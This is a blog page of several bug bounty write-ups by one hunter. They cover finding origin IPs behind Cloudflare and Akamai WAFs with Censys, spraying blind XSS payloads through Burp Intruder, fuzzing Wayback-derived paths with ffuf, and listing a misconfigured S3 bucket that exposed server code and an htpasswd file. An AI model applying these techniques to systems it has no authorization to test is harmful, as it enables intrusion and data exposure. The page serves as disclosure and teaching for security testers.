324855faab7035ad2c6f36f9344607e4

Let’s fuck waf using Origin IP: My approach on censys

by with 5 Comments Bug Bounty
Hello amazing hacker, I am Deepak Dhiman a.k.a Virdoex_hunter from India. I hope you are doing well. I am a bug bounty hunter. So many people ask me how I use censys to find origin IP behind proxy waf such as akamai,cloudflare. So don’t waste time let’s start this. If you don’t understand anything and want a detailed video on it please let me know via comments I will try to make it on my youtube. Vegeta's pride quote" Art Board Print by CasperN | Redbubble So their are two methods you can use censys for origin IP:
  •  The hardest way(but little time saver)
  •  The easiest way( like a bluff that works).
First start with the hardest way a little time saver but need to do lots of stuff. THE HARDEST WAY: 10 Awesome Dragon Ball Z Quotes • The Awesome One STEPS 1:
  •  Login to censys and go the censys search page choose certificates and in certificates search your target like this.
  •  Now open any certificate and in right you find Explore hover on it and click on hosts.
  •  Now in hosts copy every IP you found and try to open that in new tab.
Try Every certificate on and open hosts and try the same process and this is the hardest way.  
EASY WAY : You wanna play Bluff I liked it.
  Vegeta Quotes Wallpapers - Top Free Vegeta Quotes Backgrounds - WallpaperAccess
  •  Login and this time put your target in hosts.
  •  Now choose other service Autonomous System rather then Cloudflare or Akamai .
  • Try every IP in new tab and check autonomous IP but make sure cert.CN:must be target.com not anything else and also the target.com must to have in cert.CN: not in http.body or something else.
LET’s make bluff a winning game
  •  So now you have IP that works and belong to target now how to make sure which domain it pointed too and either that domain is behind any WAF.
  • grep all subdomain, resolve them using httpx or install multi url opener extension and shodan.io extension in browser.
  •  Paste all the urls and try to figure which clones or look like the ip url (front end) and if you find than on that domain tap on shodan extension to look wheather it is behind cloudflare or not like this.
  • If yes than congratulation you find IP behind waf.
  Exploitation:
  •  Dirsearch
  •  Port scan
  •  test like the domain such as rate limit,xss ,2 fa bypass , password reset poisoning etc etc.
If you like please let me know by sharing it using your social media. Thanks Regards, Deepak Dhiman Bounty I have made till now using this > $$$$    

If you like my work you can do support me by buying me a coffee.

Buy Me a Coffee
1 oh_trsYPyE1QW_RtLTPYUg

Bugcrowd and Me: A Story of Not Give Up ( My first bounty on bugcrowd)

by with No Comment Bug Bounty

Hello amazing hackers, My name is Deepak Dhiman ( also known as @Virdoex_hunter in bug bounty community ). I am a bug bounty hunter I hunt when I want to (looking for job,intern). Today I’ll share my first bounty experience on bugcrowd(after clickbaiting and no support and no invite). Hope you will enjoy and learn something .

PART 1 : N/A and dupes all around

When I start hacking on bugcrowd I came to know its a nice platform for beginners (so that time I only knew few bugs and less experience) so my first 4 reports were duplicates and I got 4 points I feel cool but after some time they make my every report was N/A and after some time I give some negative points on feedback in researcher experience and I will stop receiving any private invite.

PART 2: Finding private program using google dork

Since I am not receiving any private and I have only 14 points so I look for finding private program using dorks so I talk to Aditya Shende bro which dork list I have to use to find programs and he recommend me a github repo which help me to find program and hunt.

sushiwushi/bug-bounty-dorks

List of Google Dorks to search for companies that have a responsible disclosure program or bug bounty program which are…

github.com

PART 3: Clickbaiting

So finally I am sending reports on bugcrowd and now this year in March 21 I submit a email htmli bug on a private (joinable) program first 14 days they changed 4 triagers and every one ask me the poc again and again and after 2 month of triage they make it duplicate of a xss(since you can not login so it never be possible) means false one and than I ask invite me on that report(I know on bugcrowd its not) but I wanna see is this really a duplicate but they don’t gave me any response.So I leave it and than I report my favorite bug DOS on 3 different program and they make it duplicate by changing priority P3 to P2 and finally I found the same dos on a program where it is valid and at that time they make it P5 I mail their support team but no response still now from last 3 months (if its not clickbaiting than let me know what it is). So I tweet to support team but they give response that they will ban me instead of giving me fair result.

PART 4 : My First bounty on bugcrowd

So one day I am hunting on an rdp and their is feedback form on products so I go to xsshunter.com/app and copy my all payloads. And I put test on every field(except email) in name,message etc and intercept the request in burp and send it to intruder and choose test as position (every test) and use pitch fork attack in payload I choose simple list and paste my all xsshunter payload and click on start attack . After 5 hours I got email notification that my payload triaged and in first week it triaged 30 times and I got 3 employees ip who is logged in that 3rd party application to handle forms . I report it and next day they invite me on bugcrowd and reward me with $$$

KEY POINTS:

  1. don’t give negative feedback on platform
  2. for blind xss put your payload on every kind of input field (even in the password ,wrong attempts on admin panel because some time it save logs of creds tried for admin and may possible your blind xss payload work here).
  3. you can also use intruder for encoding for bypass protection

I hope you like this writeup.

Thank you for giving your time on this.

1 _ETcmMJ7CZ-Q6sdv49RXAg

How I get swag from a RDP by just creating a sitemap via wayback and ffuf that sitemap

by with No Comment Bug Bounty

Hello hackers this is Deepak Dhiman from India and I hope you all are doing good. So this writeup is about how I found the an interesting endpoint on target by just making the site map on a rdp program named as prepladder. Without wasting the time lets start the main point.

So one day I am testing this target and I get an endpoint name demo in it but that url is RIP (lol). So I just try one thing that is why don’t I check this endpoint on all other domains of that target and I get 200 ok on one domain and which is luckily out of scope and not so sensitive. So I run dirsearch on inscope but does not work.

So from that demo endpoint I got an Idea why don’t I generate a sitemap of target using waybackurls. So you think that you just run ffuf on all urls why You need to generate a sitemap of endpoints using them I am saying this becuase I notice in wayback that if there is a.target.com/juicy url in wayback but no longer exist it may be possible that this endpoint is exist on their new domain or other domain like b.target.com and this is what I notice.
For waybackurls I use tomnomnom waybackurl tool which you can find on github. https://github.com/tomnomnom/waybackurls

How I to generate sitemap wordlist using waybackurls.

cat alive.txt | waybackurls | cut -d “/” -f4,5,6,7,8,9 | tee -a waybackwordlist.txt

Than I run ffuf on all alivedomains with this wordlist.

ffuf -w alive.txt:URL -w waybackwordlist.txt:DIR -u URL/DIR -t 300 -mc 200,403 -of html -o sitemap.html

And I found an Interesting endpoint name attendance visiting It I can add employee on target delete any employee and also check the attendance of all employees even I can upload fake attendance.

So I just take screenshots and make a good report and got a swag from the target.

If you like this please give me a follow on twitter and Instagram.

Program: RDP(prepladder)

Bounty:Swag

Thanks for the reading.

If you like my work and wanna support you can buy me a coffee using below link.
 
 
Buy Me a Coffee
1 ya3OtXoFk3FDhRygZfuRnw

Misconfigured s3 bucket leads to Sensitive Data exposure(No super controls )

by with 2 Comments Bug Bounty

Amazon S3 (Simple Storage Service) is one of the popular and widely used storage services. Many companies are using S3 buckets to store their assets such as user profile pictures, static resources, and anything as per their business logic and needs. However, if the buckets are not configured properly, or are unclaimed, an attacker can probably perform some mischievous actions such as S3 Bucket Takeover or S3 Content Takeover.

Hi Fellow Hackers this is Deepak Dhiman from India.In this article, I will be talking about one of the recent encounters where a misconfigured S3 Bucket that disclose the old server code with auth file users.htpasswd.

You can read more about Amazon S3 here.

The application I was testing had a medium scope. The finding is related to one of the subsidiaries of the program. Let’s call the subsidiary “target.com”.

I started with subdomain enumeration and resolving unique subdomains with the following command:

“Subfinder -d target.com | httpx | tee -a alive.txt”

So I get all the alive subdomains.

So I put every single alive domain in browser let call it site.com.

https://site.com so after this I put /%C0

say: https://site.com/%C0

And I notice that it give me an cloudflare error like this,.

<Error>
<Code>InvalidURI</Code>
<Message>Couldn’t parse the specified URI.</Message>
<URI>/%C0</URI>

So I just append the target domain with .s3.amazonaws.com .

https;//target.com.s3.amazonaws.com/

And I get the bucket name. Some time it says no such bucket. So in that case what I do I just run dig on that.

$ dig site.com

So it gives CNAME of pointed domain.

So I am thinking what to do with this. So I read this article.

https://medium.com/bugbountywriteup/s3-bucket-misconfigured-access-controls-to-critical-vulnerability-6b535e3df9a5

But unluckily on CRUD operation I get access denied.

So here comes my CTF skills in role. That first check what I can do so I just run this.

aws s3 ls s3://target-bucketname

And in response I have found

PRE Server/

And after checking this I found server.js and users.httpasswd . So I am able to read their old server code(env one) and with auth users.httpasswd.

Program: RDP

Bounty: 400$

Thank you ,

Hope you like this(Sorry for bad english).

If you like you can support me by buying a coffee.

 

Buy Me a Coffee